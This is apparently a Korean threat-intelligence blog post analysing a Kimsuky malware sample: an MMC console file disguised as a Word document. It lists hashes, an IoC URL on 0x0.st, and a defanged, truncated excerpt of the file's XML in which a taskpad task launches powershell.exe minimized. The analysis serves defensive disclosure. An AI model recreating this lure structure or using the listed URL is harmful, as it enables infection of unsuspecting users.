김수키(Kimsuky) 에서 만든 msc 파일 로 위장하는 악성코드-Skibidi Boilet Master.msc(2024.8.16)-lazarusholic

김수키(Kimsuky) 에서 만든 msc 파일 로 위장하는 악성코드-Skibidi Boilet Master.msc(2024.8.16)

2024-08-19, Sakai
https://wezard4u.tistory.com/429256
#Kimsuky #MSC

오늘은 김수키(Kimsuky)에서 만든 msc 파일로 위장하는 악성코드-Skibidi Boilet Master.msc(2024.8.16)애 대해 알아보겠습니다.
MSC 파일은 Microsoft 관리 콘솔과 관련된 스냅인 제어 파일입니다.
악성코드 해쉬값
파일명:Skibidi Boilet Master.msc
사이즈:141 KB
MD5:e25027c2a3b9e45f0551604453e6f865
SHA-1:cb2ca952b8d4a70f9c8cd00265a30d0411e5f5d5
SHA-256:b13201957eec1248b3d91f2fd5a0b5d999c0c77644810f4aa28c9ecd0faf8828
이며 Microsoft Management Console(MMC) 는 MMC는 단일 인터페이스를 사용하여 여러 서비스를 관리할 수 있도록 다양한 스냅인을 실행할 수 있는 공통 프레임워크를 제공 서비스입니다.
MMC 내용
<VisualAttributes> <String Name="Applicat(i)onTitle" ID="10"/> <Icon Index="0" File="C:\Program Files\Microsoft Office\root\Office16\WINWORD(.)EXE"> <Image Name="Large" Bina(r)yRefIndex="0"/> <Image Name="Small" BinaryR(e)fIndex="1"/> <Image Name="Large48x" BinaryR(e)fIndex="2"/> </Icon> </Visual(A)ttributes> <Favori(t)es> <Favorit(e) TYPE="Group"> <String (N)ame="Name" ID="1"/> <Favor(i)tes/> </Favo(r)ite> </Favor(i)tes> <ScopeTree> <SnapinCache> <Snapin CLSID="{C96401CC-0E(1)7-11D3-(8)85B-00C04F72C717}" AllExten(s)ionsEnabled="true"/> </Sn(a)pinCache> <No(d)es> <Node ID="1" ImageIdx="0" CLSID="{C964(0)1CC-0E17-11D3-88(5)B-00C04F72C717}" Preload="true"> <Nodes/> <String N(a)me="Name" ID="3"/> <Bitmaps> <BinaryDat(a) Name="Small" BinaryRefIndex="3"/> <BinaryData Na(m)e="Large" BinaryRefIndex="4"/> </Bitm(a)ps> <Componen(t)Datas> <Component(D)ata> <GUID Name=(")Snapin">{C96401CC-0(E)17-11D3-885B-00C04F72C717}</GUID> <Stream Binar(y)RefIndex="5"/> </Compone(n)tData> </ComponentD(a)tas> <Compo(n)ents/> </Node> </Nodes> </ScopeT(r)ee> <ConsoleTas(k)pads> <ConsoleTaskpad ListSize="Medium" IsNo(d)eSpecific="true" Replaces(D)efaultView="true" No(R)esults="true" Des(c)riptionsAsText="true" NodeType="{C96401CE(-)0E17(-)11D3-885B(-)00C04(F)72C717}" ID="{656F3A6A(-)1A63-4FC4(-)9C9B-4B75AF6DF3A3}"> <String Name(=)"Name" ID="4"/> <String Name="D(e)scription" Value=""/> <String Name="Tool(t)ip" Value=""/> <Tasks> <Task Type="Co(m)mandLine" Command="powershell.exe"> <String Name="N(a)me" ID="5"/> <String Name="Desc(r)iption" ID="11"/> <Symbol> <Image Name="Small" Binar(y)RefIndex="6"/> <Image Name="Large" Binary(R)efIndex="7"/> </Symbol> <CommandLine Directory="" WindowState="Minimized" Params="-Win(d)owStyle …

IoC

b13201957eec1248b3d91f2fd5a0b5d999c0c77644810f4aa28c9ecd0faf8828
cb2ca952b8d4a70f9c8cd00265a30d0411e5f5d5
e25027c2a3b9e45f0551604453e6f865
https://0x0.st/XO5m.txt

lazarusholic

Everyday is lazarus.day^β

김수키(Kimsuky) 에서 만든 msc 파일 로 위장하는 악성코드-Skibidi Boilet Master.msc(2024.8.16)

Contents

IoC